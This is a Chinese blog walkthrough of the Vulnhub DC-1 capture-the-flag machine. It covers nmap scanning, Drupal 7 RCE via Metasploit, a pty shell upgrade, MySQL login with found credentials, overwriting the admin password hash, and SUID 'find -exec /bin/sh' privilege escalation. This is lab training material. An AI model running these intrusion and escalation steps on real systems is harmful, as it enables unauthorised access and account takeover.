入侵靶机DC-1

最新推荐文章于 2023-04-25 16:31:45 发布
最新推荐文章于 2023-04-25 16:31:45 发布
阅读量354 收藏 1
点赞数
分类专栏: DC-1-9通关秘籍
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42094992/article/details/107986228
版权

1.主机发现

namp -sP 10.3.139.0/24

2.指纹收集

whatweb 10.3.139.96

3.目录爆破

4.根据版本查询相应漏洞

根据版本可查出Drupa7.x存在远程代码执行漏洞

5.使用msf进行漏洞利用

DC-1一共有5个flag

flag1

flag2

flag3

需要登录数据库查找

python -c 'import pty;pty.spawn("/bin/bash")'

登录数据库—替换密码

mysql -udbuser -pR0ck3t

show databases;            //查询库

use drupaldb;                 //进入库

show tables;                   //查表

select * from users;        //查users字段内容

更改uid 1 密码

php scripts/password-hash.sh 123.com        //生成密码123.com

mysql -udbuser -pR0ck3t

show databases;            //查询库

use drupaldb;                 //进入库

update users set pass="$S$DsWoJrlrM2TOlo1/2WE9AFvrHzE4cV703wz3tpbBXGxCYwT6iSex" where uid=1;     //修改密码

flag4

flag5

查看find命令是和权限

find test -exec “whoami” \;

使用find命令调用/bin/bash

find test -exec “/bin/sh” \;

cd /root

ls

cat thefinalflag.txt

火中的冰~
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机DC-1练习:借助msfconsole进行漏洞查询利用getshell后,采用suid提权
7Riven's blog
12-10 2500
1.靶机IP地址发现 2.查看靶机版本和服务 -sV:用来扫描目标主机和端口上运行的软件的版本 -p-:扫描0-65535全部端口 -sS/sT/sA/sW/sM:指定使用 TCP SYN/Connect()/ACK/Window/Maimon scans的方式来对目标主机进行扫描 -Pn:选项指示NMAP跳过默认的发现检查并对执行对目标的完整端口扫描。当扫描被阻止ping探针的防火...
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
入侵靶机DC-7
干铮的博客
10-08 1446
DC-7 1.主机发现 靶机开机后DHCP获取有ip地址 2.信息收集 端口扫描 C:\Users\ASUS>Nmap 192.168.43.111 -A -p- -oN nmap.A Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-08 08:29 ?D1ú±ê×?ê±?? Nmap scan report for dc-7 (192.168.43.111) Host is up (0.00030s latency). Not s
入侵靶机DC-5
干铮的博客
10-04 375
1.主机扫描 通过已知MAC地址,确定DC-5的ip。 2.端口扫描 确定靶机开放端口 3.访问web界面 提交表单发现时间在变化 直接访问thankyou.php文件 这里可能存在文件包含 4.web目录扫描 ...
靶机Lampiao入侵实战
2201_75774378的博客
04-25 159
查看CHANGELOG.txt文件,发现网站的版本信息尝试了第一个结果失败继续提权上传漏洞的源码到靶机上使用python调出交互模式./dcow -s运行。
最详细的系统漏洞扫描并对靶机进行利用攻击演练(模拟一次黑客白帽子操作)
巴胡子
08-13 6598
万万不可做坏事,仅为学习参考使用。 一、前提准备 1、所需条件: (1)kali2.0 linux 的iso文件(最好是32位,为安装nessus做好装备) 下载网址:https://www.kali.org/downloads/ 安装步骤请自行百度搜索,基础中的基础 (2)VMware虚拟机, 也可以用其他的虚拟机软件,如vmbox(免费的) 单个人感觉不如VMware好用 VMwawre下载网...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
vulnhub靶机实战-My-cmsms靶机
最新发布
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
渗透测试实战4——Node靶机入侵
浅浅的博客
04-25 1311
一、实验环境 攻击机(Kali):192.168.247.149 靶机(Node):192.168.247.152 二、实验步骤 一)主动信息收集 1、主机发现 2、端口扫描 3、端口版本信息 扫描结果发现靶机开启了22 ssh端口和3000端口,且3000端口开放的是http服务。 二)端口探测 端口3000(http服务) 1、探测目录 因为htt...
利用kali下的msf入侵靶机
ro4lsc的博客
01-16 9863
前段时间学了msf的一些基础知识,正好有时间了,在本地搭建好了环境,准备练练手。(Tips:请勿用作非法用途,仅供学术交流)
渗透测试实战-Fowsniff靶机入侵
大方子
11-27 3974
机安装/下载 Fowsniff靶机下载:https://pan.baidu.com/s/1dvCJijStPYkeGtoSaLyg7A   Kali的IP地址:192.168.100.8 WIN7的IP地址:192.168.100.9     先用nmap 进行探测 发现目标的IP地址为192.168.100.12 然后在进行靶机端口的探测 先从80端口下手看看 ...
Kali渗透测试——利用metasploit攻击靶机WinXP SP1
dif90304的博客
05-19 998
搭建渗透测试环境 Kali攻击机 WinXP SP1 靶机 启动metasploit 跟windows RPC相关的漏洞 内部提供的漏洞攻击 靶机winxp sp1网络配置 查看虚拟机的NAT网段 配置WinXP SP1靶机的IP地址 执行漏洞利用 后漏洞利用:meterpreter> ...
渗透测试实战8——SickOS靶机入侵
浅浅的博客
05-10 3113
目录 一、实验环境 二、实验步骤 主动信息收集 端口探测——22端口 端口探测——80端口 1、目录探测 2、获取shell 3、提权 4、防火墙规则 一、实验环境 攻击机(Kali):192.168.247.181 靶机(SickOS):192.168.247.180 二、实验步骤 主动信息收集 1、主机发现 2、端口扫描 目标靶机开放8180端口和22...
web 攻击靶机
dinghongzui6895的博客
04-22 507
一、sql注入靶机攻击 首先搭建虚拟机 用kali扫描下当前网段netdiscover -r 192.168.2.0/24 发现可疑ip地址192.168.2.129 并使用nmap扫描这个ip地址,发现其开放了ftp和http协议 打开该虚拟机提供的网页,发现该网站使用url传参,可能存在sql注入点 在id=1后加一个引号,网页报错 该网站存在sq...
metasploit利用漏洞渗透攻击靶机
weixin_30876945的博客
11-05 720
1、网络测试环境构建 首先需要先配置好一个渗透测试用的网络环境,包括如图1所示的运行Kali Linux系统的计算机,如图2所示的老师给的Windows Server 2000系统的计算机。这两台计算机处于同一个网段中,可以相互通讯,Kali系统用作攻击机,下面将在此系统上运行Metasploit进行渗透测试,而Windows 2000是本次任务中需要进行渗透入侵靶机,保持安装后的默认状态,没...
入侵靶机DC-8
干铮的博客
10-15 2008
DC-8 1.主机发现 使用Nmap进行ping扫描,根据已知mac地址获取ip地址。 Nmap -sP 192.168.43.0/24 Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-15 16:30 ?D1ú±ê×?ê±?? Nmap scan report for 192.168.43.1 Host is up (0.0049s latency). MAC Address: EC:D0:9F:84:6C:D1 (Xiaomi Communi
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值